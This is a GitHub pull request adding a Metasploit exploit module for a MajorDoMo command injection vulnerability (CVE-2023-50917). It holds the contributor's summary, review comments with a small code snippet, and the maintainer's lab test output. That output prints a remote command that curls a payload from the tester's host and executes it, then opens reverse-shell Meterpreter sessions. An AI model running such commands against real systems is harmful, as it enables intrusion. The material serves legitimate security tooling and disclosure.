Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add CVE-2023-50917: MajorDoMo Command Injection Module #18630

Merged
merged 3 commits into from Jan 19, 2024
Merged

Add CVE-2023-50917: MajorDoMo Command Injection Module #18630

merged 3 commits into from Jan 19, 2024

Conversation

Chocapikk
Copy link
Contributor

@Chocapikk Chocapikk commented Dec 19, 2023
edited

Summary:

I have implemented an exploit module for a command injection vulnerability in MajorDoMo, identified as CVE-2023-50917. The vulnerability affects versions prior to 0662e5e. This module also supports scenarios where the target is protected by HTTP Basic Authentication.

Changes:

  • New Exploit Module: Added modules/exploits/linux/http/majordomo_cmd_inject_cve_2023_50917.rb.
  • MajorDoMo Instance Check: Implemented majordomo? method for confirming the target's identity based on the MD5 hash of favicon.ico.
  • HTTP Basic Authentication Handling: Added send_request_with_auth to manage HTTP Basic Authentication.
  • Updated Check Method: Enhanced check method to validate the presence of Detector.js and ascertain MajorDoMo instance status.
  • Module Options: Included options for username and password to handle HTTP Basic Authentication.

Sources and References:

Motivation:

  • My first CVE

@Chocapikk
Copy link
Contributor Author

NOTE:

I have just fixed a statement, in fact I based it on the detection of the Detector.js file, which was deleted just after the first patch on the project: sergejey/majordomo@706e5df . If you use the installation method I've recommended by replacing the thumb.php file on the latest patched version, it'll say it's not vulnerable. I've done this installation method on the fly, it's much simpler that way than setting up MajorDoMo from source. if you use a source lower than commit 0662e5e, there won't be any problems. I'm just saying that so you don't get confused.

@Chocapikk Chocapikk force-pushed the majordomo_cmd_inject_cve_2023_50917 branch from 119b2d6 to 9c9af0d Compare December 20, 2023 01:06
@smcintyre-r7 smcintyre-r7 self-assigned this Dec 20, 2023
smcintyre-r7
smcintyre-r7 requested changes Dec 20, 2023
View reviewed changes
Copy link
Contributor

@smcintyre-r7 smcintyre-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Congratulations on your first CVE and thanks for submitting a Metasploit module to us!

I was able to get the software installing and confirm that the module is working. I made some recommendations that should simplify things. Some of the changes are related to the #check method to ensure that the codes it returns are aligned with our descriptions.

modules/exploits/linux/http/majordomo_cmd_inject_cve_2023_50917.rb Outdated Show resolved Hide resolved
modules/exploits/linux/http/majordomo_cmd_inject_cve_2023_50917.rb Outdated
Comment on lines 69 to 84
def majordomo?
favicon_uri = normalize_uri(datastore['TARGETURI'], 'favicon.ico')
res = send_request_with_auth(favicon_uri)

if res.nil? || res.code != 200
print_error('Cannot verify if target is MajorDoMo')
false
elsif Rex::Text.md5(res.body) == '08d30f79c76f124754ac6f7789ca3ab1'
print_good('Target is identified as MajorDoMo instance')
true
else
print_error('Target might not be MajorDoMo')
false
end
end

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

This is only used in #check but the problem is that it doesn't differentiate between instances where the server doesn't respond and CheckCode::Unknown should be returned and when the target is not MajorDoMo. In my suggestion for the #check method changes, I broke this out to be more specific.

Suggested change
def majordomo?
favicon_uri = normalize_uri(datastore['TARGETURI'], 'favicon.ico')
res = send_request_with_auth(favicon_uri)
if res.nil? || res.code != 200
print_error('Cannot verify if target is MajorDoMo')
false
elsif Rex::Text.md5(res.body) == '08d30f79c76f124754ac6f7789ca3ab1'
print_good('Target is identified as MajorDoMo instance')
true
else
print_error('Target might not be MajorDoMo')
false
end
end

modules/exploits/linux/http/majordomo_cmd_inject_cve_2023_50917.rb Outdated Show resolved Hide resolved
modules/exploits/linux/http/majordomo_cmd_inject_cve_2023_50917.rb Outdated Show resolved Hide resolved
modules/exploits/linux/http/majordomo_cmd_inject_cve_2023_50917.rb Outdated Show resolved Hide resolved
modules/exploits/linux/http/majordomo_cmd_inject_cve_2023_50917.rb Outdated
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

You've included this but you're not actually use it. You should either remove it or use it.

Suggested change
include Msf::Exploit::CmdStager

@Chocapikk
Copy link
Contributor Author

Chocapikk commented Jan 10, 2024
edited

Hello @smcintyre-r7 , I've updated the code, I requested a review 3 weeks ago, any updates?

Thanks a lot

smcintyre-r7
smcintyre-r7 approved these changes Jan 19, 2024
View reviewed changes
Copy link
Contributor

@smcintyre-r7 smcintyre-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Hey sorry about the delay on this. I just ran through it once more and everything is looking good to me so I'll go ahead and get it landed.

Testing Output 
./msfconsole
Calling `DidYouMean::SPELL_CHECKERS.merge!(error_name => spell_checker)' has been deprecated. Please call `DidYouMean.correct_error(error_name, spell_checker)' instead.
Metasploit tip: Metasploit can be configured at startup, see msfconsole 
--help to learn more
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
                                                  
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
::::::::::::::::##############                              :::::::::::::::::::
############################  ##############################  :::::::::::::::::
#########################  ######???????????????????????######  :::::::::::::::
=========================  ####??????????()????()?????????####  :::::::::::::::
=========================  ##????()??????????????    ()?????##  ::::    :::::::
------------=============  ##??????????????????  ;;;;  ?????##  ::  ;;;;  :::::
-------------------------  ##??????????()??????  ;;;;;;?????##    ;;;;;;  :::::
-------------------------  ##??????????????????  ;;;;;;         ;;;;;;;;  :::::
++++++++++++-------------  ##??????????????????  ;;;;;;;;;;;;;;;;;;;;;;;  :::::
+++++++++++++++++++++++++  ##????????????()??  ;;;;;;;;;;;;;;;;;;;;;;;;;;;  :::
+++++++++++++++++++++++++  ##??()????????????  ;;;;;;@@  ;;;;;;;;@@  ;;;;;  :::
%%%%%%%%%%%%%++++    ;;;;  ##????????????????  ;;;;;;    ;;;  ;;;    ;;;;;  :::
%%%%%%%%%%%%%%%%%;;;;;;;;  ####??????()??????  ;;[];;;;;;;;;;;;;;;;;;;;;[]  :::
$$$$$$$$$$$$$%%  ;; %%%%%  ######?????????????  ;;;;;;              ;;;;  :::::
$$$$$$$$$$$$$$$$$  $$$$$$    ###################  ;;;;;;;;;;;;;;;;;;;;  :::::::
$$$$$$$$$$$$$$$$$$$$$$$  ;;;;                                       :::::::::::
:::::::::::::$$$$$$$$$$  ;;;;  ::  ;;  ::::::::::::  ;;  ::  ;;;;  ::::::::::::
:::::::::::::::::::::::      ::::::    :::::::::::::     ::::      ::::::::::::
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
::::::::::::::::NN::::NN::YY::::YY:::AAAAAA:::NN::::NN:::!!::::::::::::::::::::
::::::::::::::::NNNN::NN::YY::::YY::AA::::AA::NNNN::NN:::!!::::::::::::::::::::
::::::::::::::::NNNN::NN::YY::::YY::AA::::AA::NNNN::NN:::!!::::::::::::::::::::
::::::::::::::::NN::NNNN::::YYYY::::AAAAAAAA::NN::NNNN:::!!::::::::::::::::::::
::::::::::::::::NN::NNNN:::::YY:::::AA::::AA::NN::NNNN:::::::::::::::::::::::::
::::::::::::::::NN::::NN:::::YY:::::AA::::AA::NN::::NN:::!!::::::::::::::::::::
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:::::::::::::::::YOU HAVE DONE THE NYAN FOR 31337 SECONDS!:::::::::::::::::::::


       =[ metasploit v6.3.48-dev-0a2dea523f         
+ -- --=[ 2394 exploits - 1249 auxiliary - 432 post       ]
+ -- --=[ 1391 payloads - 46 encoders - 11 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit Documentation: https://docs.metasploit.com/

[*] Processing /home/smcintyre/.msf4/msfconsole.rc for ERB directives.
resource (/home/smcintyre/.msf4/msfconsole.rc)> load request
[*] Successfully loaded plugin: Request
resource (/home/smcintyre/.msf4/msfconsole.rc)> load versions
[*] Successfully loaded plugin: Versions
resource (/home/smcintyre/.msf4/msfconsole.rc)> loadpath test/modules
Loaded 39 modules:
    14 auxiliary modules
    13 exploit modules
    12 post modules
msf6 exploit(linux/http/majordomo_cmd_inject_cve_2023_50917) > show options 

Module options (exploit/linux/http/majordomo_cmd_inject_cve_2023_50917):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.159.11   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The URI path to MajorDoMo
   VHOST                       no        HTTP server virtual host


Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      HgKMiOgkP        no        Name to use on remote system when storing payload; cannot contain spaces.
   FETCH_SRVHOST                        no        Local IP to use for serving payload
   FETCH_SRVPORT       8888             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR                   yes       Remote writable dir to store payload; cannot contain spaces.
   LHOST               192.168.159.128  yes       The listen address (an interface may be specified)
   LPORT               5555             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

msf6 exploit(linux/http/majordomo_cmd_inject_cve_2023_50917) > run

[*] Command to run on remote host: curl -so ./lXqFewedpLBY http://192.168.159.128:8888/dau8JtEFWcUux21CRy4HUQ; chmod +x ./lXqFewedpLBY; ./lXqFewedpLBY &
[*] Fetch Handler listening on 192.168.159.128:8888
[*] HTTP server started
[*] Adding resource /dau8JtEFWcUux21CRy4HUQ
[*] Started reverse TCP handler on 192.168.159.128:5555 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.159.11:80 can be exploited!
[+] Target is identified as MajorDoMo instance
[*] Performing command injection test issuing a sleep command of 6 seconds.
[*] Elapsed time: 6.113898670999333 seconds.
[+] The target is vulnerable. Successfully tested command injection.
[*] Client 192.168.159.11 requested /dau8JtEFWcUux21CRy4HUQ
[*] Sending payload to 192.168.159.11 (curl/7.81.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 192.168.159.11
[*] Meterpreter session 1 opened (192.168.159.128:5555 -> 192.168.159.11:49598) at 2024-01-19 17:05:14 -0500

meterpreter > 
meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer     : 192.168.159.11
OS           : Ubuntu 22.04 (Linux 5.15.0-88-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > exit
[*] Shutting down session: 1

[*] 192.168.159.11 - Meterpreter session 1 closed.  Reason: Died
msf6 exploit(linux/http/majordomo_cmd_inject_cve_2023_50917) > set PAYLOAD cmd/unix/python/meterpreter/reverse_tcp
PAYLOAD => cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(linux/http/majordomo_cmd_inject_cve_2023_50917) > show options 

Module options (exploit/linux/http/majordomo_cmd_inject_cve_2023_50917):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.159.11   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The URI path to MajorDoMo
   VHOST                       no        HTTP server virtual host


Payload options (cmd/unix/python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.159.128  yes       The listen address (an interface may be specified)
   LPORT  5555             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

msf6 exploit(linux/http/majordomo_cmd_inject_cve_2023_50917) > run

[*] Started reverse TCP handler on 192.168.159.128:5555 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.159.11:80 can be exploited!
[+] Target is identified as MajorDoMo instance
[*] Performing command injection test issuing a sleep command of 10 seconds.
[*] Elapsed time: 10.097079567000037 seconds.
[+] The target is vulnerable. Successfully tested command injection.
[*] Sending stage (24772 bytes) to 192.168.159.11
[*] Meterpreter session 2 opened (192.168.159.128:5555 -> 192.168.159.11:44372) at 2024-01-19 17:06:46 -0500

meterpreter > exit
[*] Shutting down session: 2

[*] 192.168.159.11 - Meterpreter session 2 closed.  Reason: Died
msf6 exploit(linux/http/majordomo_cmd_inject_cve_2023_50917) > exit

@smcintyre-r7 smcintyre-r7 merged commit 06dcc82 into rapid7:master Jan 19, 2024
34 checks passed
@smcintyre-r7
Copy link
Contributor

Release Notes

This adds an exploit for a command injection vulnerability in MajorDoMo versions before 0662e5e.

@adfoster-r7 adfoster-r7 added the rn-modules release notes for new or majorly enhanced modules label Jan 26, 2024
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@smcintyre-r7 smcintyre-r7 smcintyre-r7 approved these changes

Assignees

@smcintyre-r7 smcintyre-r7

Labels
docs module rn-modules release notes for new or majorly enhanced modules
Projects
Metasploit Kanban
Archived in project
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
3 participants
@Chocapikk @smcintyre-r7 @adfoster-r7